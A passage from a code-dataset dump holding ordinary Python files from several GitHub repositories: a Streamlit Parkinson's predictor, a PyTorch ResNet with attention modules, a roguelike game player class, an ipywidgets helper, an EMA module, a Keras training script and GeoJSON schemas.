RAP,APQ3,APQ,NHR,HNR,RPDE,DFA,spread1,spread2,D2]]\n predictions = parkinsons_model.predict(features)\n\n if predictions[0] == 1:\n st.success(\"The person has Parkinson's disease\")\n else:\n st.success(\"The person does not have Parkinson's disease\")\n","repo_name":"WongSC13/streamlit_parkinson","sub_path":"streamlit_parkinson_v5.py","file_name":"streamlit_parkinson_v5.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30124446901","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport math\r\nfrom torch.nn import init\r\nfrom .attention import *\r\n\r\ndef conv3x3(in_planes, out_planes, stride=1):\r\n \"3x3 convolution with padding\"\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\r\n padding=1, bias=False)\r\n\r\nclass target(nn.Module): \r\n def __init__(self, feat_type='feature'):\r\n super(target, self).__init__()\r\n self.feat_type = feat_type\r\n \r\n def forward(self, x):\r\n if self.feat_type == 'feature':\r\n return x\r\n elif self.feat_type == 'attention':\r\n return x\r\n else:\r\n raise ValueError('Select Proper Feat Type')\r\n \r\nclass identity(nn.Module):\r\n def forward(self, out):\r\n return out, []\r\n \r\n \r\nclass BasicBlock(nn.Module):\r\n expansion = 1\r\n\r\n def __init__(self, inplanes, planes, stride=1, downsample=None, attention_type='ir'):\r\n super(BasicBlock, self).__init__()\r\n self.conv1 = conv3x3(inplanes, planes, stride)\r\n self.bn1 = nn.BatchNorm2d(planes)\r\n self.relu = nn.ReLU(inplace=True)\r\n self.conv2 = conv3x3(planes, planes)\r\n self.bn2 = nn.BatchNorm2d(planes)\r\n self.downsample = downsample\r\n self.stride = stride\r\n self.attention_type = attention_type\r\n \r\n \r\n # Attention Type\r\n if attention_type == 'ir':\r\n self.attention = identity()\r\n elif attention_type == 'cbam':\r\n self.attention = CBAM(planes, 16)\r\n elif attention_type == 'se':\r\n self.attention = SELayer(planes, 16)\r\n else:\r\n raise ValueError('Select Proper Attention Type')\r\n\r\n def forward(self, x):\r\n residual = x\r\n\r\n out = self.conv1(x)\r\n out = self.bn1(out)\r\n out = self.relu(out)\r\n\r\n out = self.conv2(out)\r\n out = self.bn2(out)\r\n\r\n if self.downsample is not None:\r\n residual = self.downsample(x)\r\n\r\n # Calculation Attention\r\n out, _ = self.attention(out)\r\n out += residual\r\n out = self.relu(out)\r\n return out\r\n \r\n\r\nclass Bottleneck(nn.Module):\r\n expansion = 4\r\n\r\n def __init__(self, inplanes, planes, stride=1, downsample=None, attention_type='ir'):\r\n super(Bottleneck, self).__init__()\r\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\r\n self.bn1 = nn.BatchNorm2d(planes)\r\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\r\n padding=1, bias=False)\r\n self.bn2 = nn.BatchNorm2d(planes)\r\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\r\n self.bn3 = nn.BatchNorm2d(planes * 4)\r\n self.relu = nn.ReLU(inplace=True)\r\n self.downsample = downsample\r\n self.stride = stride\r\n self.attention_type = attention_type\r\n \r\n \r\n # Attention Type\r\n if attention_type == 'ir':\r\n self.attention = identity()\r\n elif attention_type == 'cbam':\r\n self.attention = CBAM(planes * 4, 16)\r\n elif attention_type == 'se':\r\n self.attention = SELayer(planes * 4, 16)\r\n else:\r\n raise ValueError('Select Proper Attention Type')\r\n\r\n\r\n def forward(self, x):\r\n residual = x\r\n\r\n out = self.conv1(x)\r\n out = self.bn1(out)\r\n out = self.relu(out)\r\n\r\n out = self.conv2(out)\r\n out = self.bn2(out)\r\n out = self.relu(out)\r\n\r\n out = self.conv3(out)\r\n out = self.bn3(out)\r\n\r\n if self.downsample is not None:\r\n residual = 
self.downsample(x)\n\n # Calculation Attention\n out, _ = self.attention(out)\n out += residual\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=1000, attention_type=None, imagenet=True):\n self.inplanes = 64\n super(ResNet, self).__init__()\n # different model config between ImageNet and CIFAR \n self.imagenet = imagenet\n \n if self.imagenet:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d((1,1))\n \n self.layer1 = self._make_layer(block, 64, layers[0], stride=1, attention_type=attention_type)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2, attention_type=attention_type)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2, attention_type=attention_type)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2, attention_type=attention_type)\n\n if self.imagenet:\n self.conv_bridge = nn.Conv2d(512 * block.expansion, 3072, kernel_size=3, stride=1, padding=1)\n else:\n self.conv_bridge = nn.Conv2d(512 * block.expansion, 512, kernel_size=3, stride=1, padding=1)\n\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n \n \n init.kaiming_normal(self.fc.weight)\n for key in self.state_dict():\n if key.split('.')[-1]==\"weight\":\n if \"conv\" in key:\n init.kaiming_normal(self.state_dict()[key], mode='fan_out')\n if \"bn\" in key:\n if \"SpatialGate\" in key:\n self.state_dict()[key][...] = 0\n else:\n self.state_dict()[key][...] = 1\n elif key.split(\".\")[-1]=='bias':\n self.state_dict()[key][...] 
= 0\n\n\n def _make_layer(self, block, planes, blocks, stride=1, attention_type='ir'):\r\n downsample = None\r\n if stride != 1 or self.inplanes != planes * block.expansion:\r\n downsample = nn.Sequential(\r\n nn.Conv2d(self.inplanes, planes * block.expansion,\r\n kernel_size=1, stride=stride, bias=False),\r\n nn.BatchNorm2d(planes * block.expansion),\r\n )\r\n\r\n layers = []\r\n layers.append(block(self.inplanes, planes, stride, downsample, attention_type=attention_type))\r\n self.inplanes = planes * block.expansion\r\n for i in range(1, blocks):\r\n layers.append(block(self.inplanes, planes, attention_type=attention_type))\r\n\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x, train=True):\r\n x = self.conv1(x)\r\n x = self.bn1(x)\r\n x = self.relu(x)\r\n if self.imagenet:\r\n x = self.maxpool(x)\r\n\r\n x = self.layer1(x)\r\n x = self.layer2(x)\r\n x = self.layer3(x)\r\n x = self.layer4(x)\r\n\r\n # Bridge and Reconstruction\r\n if train:\r\n x_recon = self.conv_bridge(x)\r\n\r\n x = self.avgpool(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.fc(x)\r\n \r\n if train:\r\n return x, x_recon\r\n else:\r\n return x\r\n\r\n\r\ndef load_resnet(depth, num_classes, attention_type, imagenet):\r\n assert depth in [18, 34, 50, 101], 'network depth should be 18, 34, 50 or 101'\r\n\r\n if depth == 18:\r\n model = ResNet(BasicBlock, [2, 2, 2, 2], num_classes, attention_type=attention_type, imagenet=imagenet)\r\n\r\n elif depth == 34:\r\n model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\r\n\r\n elif depth == 50:\r\n model = ResNet(Bottleneck, [3, 4, 6, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\r\n\r\n elif depth == 101:\r\n model = ResNet(Bottleneck, [3, 4, 23, 3], num_classes, attention_type=attention_type, imagenet=imagenet)\r\n\r\n return model\r\n\r\n\r\nif __name__=='__main__':\r\n model = load_resnet(50, 1000, 'cbam', imagenet=True) # load_resnet has no default for imagenet\r\n x = torch.ones([1, 3, 256, 256])\r\n out, out_recon = model(x, train=True)\r\n print(out)","repo_name":"tjdhg456/QualNet-Pytorch","sub_path":"object_classification/module/backbone/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":7911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10633965735","text":"from math import ceil\r\nfrom collections import Counter\r\n\r\nfrom src.geometry.direction import DIRS, directions_on\r\nfrom src.mobile.mobile_object import MobileObject\r\nfrom data.res import walkable_for_players, npc, max_armor_value, traders\r\nfrom src.geometry.geometry import distance, square, manhattan, ring\r\n\r\n\r\nclass Player(MobileObject):\r\n window_height = 21\r\n window_width = 31\r\n pickup_distance = 1\r\n talking_distance = 2\r\n max_hp = 0\r\n max_ap = 0\r\n class_ = \"Никто\"\r\n descr = \"мистер Никто\"\r\n see = 12\r\n opponents = npc\r\n\r\n def __init__(self, name):\r\n super().__init__('игрок', '@' + name[0])\r\n self.name = name\r\n self.money = 0\r\n self.see = 12\r\n self.possible_keys = ['move_player', 'nothing', 'open_inventory', 'use', 'remove',\r\n 'info', 'showshopitems', 'trade', 'share', 'equip',\r\n 'use_main_weapon', \"use_second_weapon\", 'unequip', 'magic']\r\n self.inventory = []\r\n self.magicbook = []\r\n self.walkable_objects = walkable_for_players\r\n self.last_happend = \"\"\r\n self.next_level_exp = int(self.level ** 1.5 * 2 + 10)\r\n\r\n def start_equip(self):\r\n pass\r\n\r\n def level_up(self):\r\n if self.exp < self.next_level_exp: return ''\r\n message = \"\"\r\n while self.exp >= self.next_level_exp:\r\n self.exp -= self.next_level_exp\r\n self.level += 1\r\n self.next_level_exp = int(self.level ** 1.5 * 2 + 10)\r\n self.max_hp += 1\r\n self.see += 1\r\n self.heal()\r\n if 
self.level % 4 == 0: self.max_ap += 1\n message = '\\n{} теперь имеет {} уровень'.format(self.name, self.level)\n if self.level % 2 == 0:\n self.world.power_up_monsters()\n message += \", монстры так же увеличили свою силу\"\n return message\n\n def stats(self):\n return '{name}, {_class}, уровень {level}:\\n[HP = {hp}, AP = {ap}, Защита = {armor}]. Деньги = {money}, EXP = {exp}'.format(\n name=self.name, _class=self.class_, hp=self.hp,\n armor=sum(a.block for a in self.equipment.values() if a is not None and a.kind == 'armor'),\n ap=self.ap, money=self.money, level=self.level, exp=self.exp)\n\n def heal(self):\n self.hp = self.max_hp\n\n def info(self):\n self.last_happend = '{}. Необходимо {} опыта до нового уровня.\\nНесет с собой {}'.format(self.descr,\n self.next_level_exp - self.exp,\n '\\n'.join(\n str(i) for i in\n set(\n self.equipment.values())\n if i is not None))\n if len(self.magicbook) > 0:\n self.last_happend += '\\nТак же знает следующие заклинания:\\n' + '\\n'.join(str(m) for m in self.magicbook)\n\n def share(self, player_name, item_name):\n try:\n player = next(p for p in self.world.players.values() if p.name == player_name)\n item = next(i for i in self.inventory if i.name == item_name)\n if distance(self.position, player.position) <= self.talking_distance:\n self.inventory.remove(item)\n player.inventory.append(item)\n self.last_happend = '{} передал {} в руки {}'.format(self.name, item_name, player_name)\n else:\n self.last_happend = '{} слишком далеко от {}'.format(self.name, player_name)\n except StopIteration:\n self.last_happend = \"{} не может дать {} в руки {}\".format(self.name, item_name, player_name)\n\n def move_player(self, direction):\n target = DIRS[direction].go(self.position)\n if not self.world.can_move(self, target) and self.world.is_occupied(target):\n self.use_main_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.use_second_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.last_happend = self.name + ' не может походить туда'\n elif not self.world.can_move(self, target):\n self.last_happend = self.name + ' не может походить туда'\n else:\n need_points = self.points_to_go(target)\n if self.ap >= need_points:\n self.move(target, need_points)\n else:\n self.last_happend = self.name + ' не имеет очков хода чтобы походить'\n\n def showshopitems(self):\n nearby_merchant_items = (self.world.mobs[m].show_items() for m in self.world.mobs_near(square(self.position, 2))\n if self.world.mobs[m].kind in traders)\n\n self.last_happend = next(\n nearby_merchant_items, self.name + ' спросил никого о торгах')\n\n def get_trade_offers(self):\n for m in self.world.mobs_near(square(self.position, 2)):\n if self.world.mobs[m].kind in traders:\n return self.world.mobs[m].get_trade_info()\n return None\n\n def trade(self, item_name, merchant_name=\"\"):\n try:\n merchant = next(self.world.mobs[m] for m in self.world.mobs_near(square(self.position, 2)) if\n self.world.mobs[m].kind in traders if merchant_name == \"\" or self.world.mobs[m].name == merchant_name)\n if item_name not in merchant.store:\n self.last_happend = \"у торговца нет \" + item_name\n elif self.money < merchant.store[item_name].price:\n self.last_happend = self.name + ' не имеет достаточно денег на ' + item_name\n else:\n self.last_happend = merchant.sold(self, item_name)\n except StopIteration:\n self.last_happend = self.name + ' попытался поторговаться с никем'\n\n def open_inventory(self):\n # FIXME here, use counter properly pls\n showed_dict = Counter(self.inventory)\n 
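# A possible fix for the FIXME above (hypothetical sketch, not from the original repo):\r\n # count by a stable key such as the item name instead of by object, e.g.\r\n # showed_dict = Counter(i.name for i in self.inventory)\r\n 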
self.last_happend = 'Предметы:\\n'\n self.last_happend += '\\n'.join(\n '{} - {}, {} штук'.format(item.name, item.description, showed_dict[item]) for item in showed_dict)\n self.last_happend += '\\n'\n\n def inventory_for_web(self):\n showed_dict = Counter(self.inventory)\n return [dict(count=cnt, **item.info()) for item, cnt in sorted(showed_dict.items(), key=lambda x: x[0].name)]\n\n def blocked_damage(self, damage):\n return ceil(damage * (1 - (sum(\n a.block for a in self.equipment.values() if a is not None and a.kind == 'armor') / max_armor_value)))\n\n def masking(self):\n return self.obscurity\n\n def on_position_left(self, x, y):\n pos = (int(x), int(y))\n if pos == self.position:\n return\n directions = directions_on(self.position, pos)\n for d in directions:\n self.move_player(d)\n if \"не может походить туда\" not in self.last_happend:\n break\n else:\n self.last_happend = self.name + \" не может походить туда\"\n\n def on_position_right(self, x, y):\n pos = (int(x), int(y))\n if pos == self.position:\n return\n dirs = directions_on(self.position, pos)\n if len(dirs) == 0:\n return\n direction = dirs[0]\n self.use_main_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.use_second_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.last_happend = self.name + \" не иммеет оружия\"\n\n def equip(self, item_name):\n try:\n weapon = next(i for i in self.inventory if i.name == item_name and i.tag == 'equipable')\n for part in weapon.bodyparts:\n if self.equipment[part] is not None: self.equipment[part].unequip()\n weapon.equip(self)\n self.inventory.remove(weapon)\n self.last_happend = '{} надел {}'.format(self.name, item_name)\n except StopIteration:\n self.last_happend = \"{} не может надеть {}\".format(self.name, item_name)\n\n def unequip(self, item_name):\n try:\n weapon = next(i for i in set(self.equipment.values()) if i is not None and i.name == item_name)\n weapon.unequip()\n self.last_happend = '{} снял {}'.format(self.name, item_name)\n except StopIteration:\n self.last_happend = '{} не имеет {}'.format(self.name, item_name)\n\n def use(self, item_name, *item_args):\n try:\n item = next(i for i in self.inventory if i.name == item_name and i.kind == 'usable')\n self.last_happend = item.use(self, *item_args)\n except StopIteration:\n self.last_happend = self.name + \" не может использовать \" + item_name\n\n def equip_or_use(self, item_name, *item_args):\n try:\n item = next(i for i in self.inventory if i.name == item_name and i.kind == 'usable')\n self.last_happend = item.use(self, *item_args)\n except StopIteration:\n self.equip(item_name)\n\n def remove(self, item_name):\n try:\n item = next(i for i in self.inventory if i.name == item_name)\n item.remove(self)\n self.last_happend = '{} выкинул {}'.format(self.name, item.name)\n except StopIteration:\n self.last_happend = '{} не имеет {}'.format(self.name, item_name)\n\n def nothing(self):\n self.last_happend = '{} пропускает ход'.format(self.name)\n self.ap -= 1\n\n def use_weapon(self, weapon, direction):\n d = DIRS[direction]\n if self.ap >= weapon.cost:\n self.last_happend = self.name + weapon.use(d)\n else:\n self.last_happend = self.name + ' не имеет достаточно очков для ' + weapon.name\n\n def use_main_weapon(self, direction):\n if self.equipment['основное'] is not None and self.equipment['основное'].kind == 'weapon':\n return self.use_weapon(self.equipment['основное'], direction)\n else:\n self.last_happend = self.name + ' не имеет основного оружия'\n\n def use_second_weapon(self, 
direction):\n if self.equipment['дополнительное'] is not None and self.equipment['дополнительное'].kind == 'weapon':\n return self.use_weapon(self.equipment['дополнительное'], direction)\n else:\n self.last_happend = self.name + ' не имеет запасного оружия'\n\n def magic(self, magic_name):\n try:\n self.last_happend = self.name + next(\n magic for magic in self.magicbook if magic is not None and magic.name == magic_name).use()\n except StopIteration:\n self.last_happend = self.name + ' не имеет ' + magic_name\n\n def drop_on_world(self, item_name):\n try:\n item = next(i for i in self.inventory if i.name == item_name)\n except StopIteration:\n self.last_happend = self.name + ' не имеет ' + item_name\n else:\n try:\n pos = next(p for p in ring(self.position, self.pickup_distance + 1, self.pickup_distance + 1) if\n self.world.can_move(self, p))\n item.remove(self)\n self.world.place_drop(item, pos)\n self.last_happend = self.name + \" выбросил \" + item_name + \" на землю\"\n except StopIteration:\n self.last_happend = self.name + \" не может выбросить предмет потому что вокруг все занято\"\n\n def pick_up_item(self):\n positions = [position for position in self.world.drop\n if manhattan(self.position, position) <= self.pickup_distance]\n\n pick_up_message = ('\\n{} поднял {}'.format(self.name, self.world.items_names(positions))\n if len(positions) > 0 else '')\n for position in positions:\n self.inventory.extend(self.world.drop[position])\n del self.world.drop[position]\n return pick_up_message\n\n def drop_award(self):\n for item in self.inventory:\n self.world.place_drop(item, self.position)\n return \", \".join(i.name for i in self.inventory)\n\n def plot(self):\n start_line = '\\n╔' + '══' * self.window_width + '╗'\n end_line = '\\n╚' + '══' * self.window_width + '╝'\n\n map_plotted = start_line\n for i in range(self.position[0] - self.window_height // 2, self.position[0] + self.window_height // 2 + 1):\n line = ''\n for j in range(self.position[1] - self.window_width // 2, self.position[1] + self.window_width // 2 + 1):\n if abs(distance(self.position, (i, j)) - self.see) <= 1:\n line += '░░'\n elif distance(self.position, (i, j)) > self.see:\n line += '▒▒'\n elif self.world.is_occupied((i, j)):\n line += self.world.mobs[(i, j)].look\n elif self.world.is_drop((i, j)):\n line += self.world.drop[(i, j)][-1].look\n elif self.world.board.is_inside((i, j)):\n line += self.world.board.square((i, j)).look\n else:\n line += '▓▓'\n map_plotted += '\\n║' + line + '║'\n map_plotted += end_line\n return map_plotted\n\n def plot_for_web(self):\n start_line = '╔' + '══' * self.window_width + '╗'\n end_line = '
    ╚' + '══' * self.window_width + '╝'\n descriptions = {}\n\n map_plotted = start_line\n for i in range(self.position[0] - self.window_height // 2, self.position[0] + self.window_height // 2 + 1):\n line = ''\n for j in range(self.position[1] - self.window_width // 2, self.position[1] + self.window_width // 2 + 1):\n if abs(distance(self.position, (i, j)) - self.see) <= 1:\n line += '░░'\n elif distance(self.position, (i, j)) > self.see:\n line += '▒▒'\n elif self.world.is_occupied((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = self.world.mobs[(i, j)].show()\n style = \"\"\n if self.world.board.is_inside((i, j)):\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.mobs[(i, j)].look}\"\n elif self.world.is_drop((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = str(self.world.drop[(i, j)][-1])\n style = \"\"\n if self.world.board.is_inside((i, j)):\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.drop[(i, j)][-1].look}\"\n elif self.world.board.is_inside((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = self.world.board.square((i, j)).description\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.board.square((i, j)).look}\"\n else:\n line += '▓▓'\n map_plotted += '
    ║' + line + '║'\n map_plotted += end_line\n return map_plotted, descriptions\n\n def is_player(self):\n return True\n","repo_name":"arovesto/underdanger","sub_path":"src/mobile/npc/player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"30110725303","text":"import os\nfrom typing import List, Optional, Dict\nfrom ipywidgets import Label, HBox, VBox, HTML\n\nclass BaseAnalysis():\n def __init__(self):\n self._return_widgets = []\n self.pixel_value_frequencies: Optional[Dict] = None\n \n def _add_result(self, file: str, label: str):\n stats = os.stat(str(file))\n size = stats.st_size\n name_label = Label(label)\n file_label = Label(file)\n size_label = HTML(f\"
{size}\")\n box = HBox(children=[name_label, file_label, size_label])\n \n self._return_widgets.append({\n \"widget\": box,\n \"label\": label,\n \"file\": file,\n \"size\": size,\n \"frequencies\": self.pixel_value_frequencies if self.pixel_value_frequencies is not None else {}\n })\n \n def _add_multi_file_result(self, files: List[str], label: str):\n size = 0\n for file in files:\n size += os.stat(file).st_size\n \n name_label = Label(label)\n list_items = [f'{str(file)}{os.stat(file).st_size}' for file in files]\n file_label = HTML('' + '\r'.join(list_items) + '')\n box = VBox(children=[name_label, file_label])\n \n self._return_widgets.append({\n \"widget\": box,\n \"name\": name_label,\n \"files\": files,\n \"size\": size,\n \"frequencies\": self.pixel_value_frequencies if self.pixel_value_frequencies is not None else {}\n })\n \n def get_results(self, widgets: List) -> None:\n widgets.extend(self._return_widgets)\n","repo_name":"jheinnic/capsule-6366552","sub_path":"code/v1/base_analysis.py","file_name":"base_analysis.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2084979130","text":"\"\"\"Exponential moving average (EMA) Code.\n\n* Reference: https://www.zijianhu.com/post/pytorch/ema/\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom copy import deepcopy\nfrom collections import OrderedDict\n\n\nclass EMA(nn.Module):\n \"\"\"EMA.\"\"\"\n\n def __init__(self, model: nn.Module, decay: float, device: torch.device):\n \"\"\"Get a model and decay parameter.\"\"\"\n super().__init__()\n self.decay = decay\n self.model = model\n\n self.shadow = deepcopy(self.model)\n self.shadow.eval()\n self.shadow.to(device)\n for param in self.shadow.parameters():\n param.requires_grad_(False)\n\n @torch.no_grad()\n def update(self):\n \"\"\"Update.\"\"\"\n if not self.training:\n print(\"EMA update should only be called during training\")\n return\n\n model_params = OrderedDict(self.model.named_parameters())\n shadow_params = OrderedDict(self.shadow.named_parameters())\n\n # check if both model contains the same set of keys\n assert model_params.keys() == shadow_params.keys()\n\n for name, param in model_params.items():\n # shadow_variable -= (1 - decay) * (shadow_variable - variable)\n shadow_params[name].sub_(\n (1. 
- self.decay) * (shadow_params[name] - param)\n )\n\n model_buffers = OrderedDict(self.model.named_buffers())\n shadow_buffers = OrderedDict(self.shadow.named_buffers())\n\n # check if both model contains the same set of keys\n assert model_buffers.keys() == shadow_buffers.keys()\n\n for name, buffer in model_buffers.items():\n # buffers are copied\n shadow_buffers[name].copy_(buffer)\n","repo_name":"tyui592/pytorch_FlexMatch","sub_path":"ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35030918047","text":"# Importing libraries\nfrom keras import applications\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense, Conv2D\nfrom keras.layers import Activation, BatchNormalization, MaxPooling2D\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom keras.models import load_model\n\nnp.random.seed(8)\n\n# Constants and Hyperparameters.\nimg_width, img_height = 128, 128\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/valid'\nnb_train_samples = 1600\nnb_validation_samples = 400\nepochs = 20\nbatch_size = 32\nchanDim = -1\ninput_shape = (img_width, img_height, 3)\nclasses = 4\n\n\n# Convolutional model\n# CONV -> RELU -> POOL\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), padding=\"same\",input_shape=input_shape))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# CONV -> RELU -> POOL \nmodel.add(Conv2D(32, (3, 3), padding=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# FC -> RELU \nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation(\"relu\"))\nmodel.add(Dropout(0.5))\n\n# Softmax\nmodel.add(Dense(classes))\nmodel.add(Activation(\"softmax\"))\n\n# Compiling the model with Adam optimizer\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers.Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-15, decay=0.0),metrics=['accuracy'])\n\n# Data Augmentation only used for rescaling planned to use for zoom and flipping for increasing data set\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255, horizontal_flip=True)\n # ,zoom_range=0.2,\n \n\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(128, 128),\n batch_size=batch_size,\n class_mode='categorical')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(128, 128),\n batch_size=batch_size,\n class_mode='categorical')\n\n# Fine-tuning the model\nH = model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples//batch_size,\n epochs=epochs,\n verbose = 1,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples//batch_size,\n shuffle = True)\n\n# print(validation_generator.class_indices)\n\n# Saving the model\nmodel.save(str(epochs)+'epochs.h5')\n\nfrom keras import backend as K\nK.clear_session()\n\n# Plotting results\nN = np.arange(0, epochs)\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(N, H.history[\"loss\"], label=\"train_loss\")\nplt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(N, H.history[\"acc\"], label=\"train_acc\")\nplt.plot(N, H.history[\"val_acc\"], label=\"val_acc\")\nplt.plot()\nplt.title(\"Training, Valid Accuracy & Loss\")\nplt.xlabel(\"#Epoch\")\nplt.ylabel(\"Accuracy & Loss\")\nplt.legend()\nplt.savefig(str(epochs)+'epochs.png')\nplt.show()\n","repo_name":"saiwho/ikea-dataset-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21618626554","text":"from dataclasses import dataclass\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\n\nimport geojson\nimport shapely.geometry\nfrom marshmallow import Schema\nfrom marshmallow import ValidationError\nfrom marshmallow import fields\nfrom marshmallow import post_load\nfrom marshmallow import validate\n\nfrom geoschema.logger import get_logger\n\nLOGGER = get_logger()\n\n\n@dataclass\nclass GeoJsonGeometry:\n \"\"\"\n Any GeoJSON geometry in 2D coordinates\n\n This is a generic base class or type for all of the GeoJSON geometries.\n To effectively use inheritance with dataclasses, it is easier to use all\n optional attributes that are initialized with None. All the inherited\n classes override these defaults.\n \"\"\"\n\n type: str = None\n coordinates: List[float] = None\n bbox: List[float] = None\n\n @property\n def __geo_interface__(self) -> Dict:\n return self.to_dict()\n\n def to_dict(self) -> Dict:\n return {\"type\": self.type, \"coordinates\": self.coordinates, \"bbox\": self.bbox}\n\n\n@dataclass\nclass GeoJsonPoint(GeoJsonGeometry):\n \"\"\"\n A GeoJSON point in 2D coordinates\n\n The `bbox` for a point is always going to be [x, y, x, y].\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonPoint\n >>> geojson_point = GeoJsonPoint(**{\"type\": \"Point\", \"coordinates\": [-115.81, 37.24]})\n GeoJsonPoint(type='Point', coordinates=[-115.81, 37.24], bbox=None)\n >>> geojson_point.x\n -115.81\n >>> geojson_point.y\n 37.24\n >>> geojson.dumps(geojson_point)\n '{\"type\": \"Point\", \"coordinates\": [-115.81, 37.24], \"bbox\": [-115.81, 37.24, -115.81, 37.24]}'\n >>> geojson_point.shape\n \n\n .. 
seealso::\n - https://geojson.org/schema/Point.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.2\n \"\"\"\n\n type: str = \"Point\"\n coordinates: List[float] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.Point(self.x, self.y)\n self.bbox = list(self._shape.bounds)\n\n @property\n def x(self):\n return self.coordinates[0]\n\n @property\n def y(self):\n return self.coordinates[1]\n\n @property\n def shape(self) -> shapely.geometry.Point:\n return self._shape\n\n\nclass GeoJsonPointSchema(Schema):\n \"\"\"\n A GeoJSON point schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonPoint\n from geoschema.geojson_schemas import GeoJsonPointSchema\n\n point = geojson.Point((-115.81, 37.24))\n assert isinstance(point, geojson.geometry.Point)\n assert isinstance(point, dict) # it is also a Dict\n geojson_dump = geojson.dumps(point)\n point_schema = GeoJsonPointSchema()\n geojson_point = point_schema.load(point) # load a geojson dict\n assert isinstance(geojson_point, GeoJsonPoint)\n geojson_point = point_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_point, GeoJsonPoint)\n serialized = geojson.dumps(geojson_point)\n\n .. seealso::\n - https://geojson.org/schema/Point.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.2\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"Point\"), required=True)\n coordinates = fields.List(\n fields.Float(), validate=validate.Length(min=2, max=2), required=True\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonPoint:\n return GeoJsonPoint(**data)\n\n\n@dataclass\nclass GeoJsonMultiPoint(GeoJsonGeometry):\n \"\"\"\n A GeoJSON line string in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiPoint\n\n >>> data = {\"coordinates\": [[-155.52, 19.61], [-156.22, 20.74], [-157.97, 21.46]], \"type\": \"MultiPoint\"}\n >>> geojson_points = GeoJsonMultiPoint(**data)\n >>> geojson_points\n GeoJsonMultiPoint(type='MultiPoint', coordinates=[[-155.52, 19.61], [-156.22, 20.74], 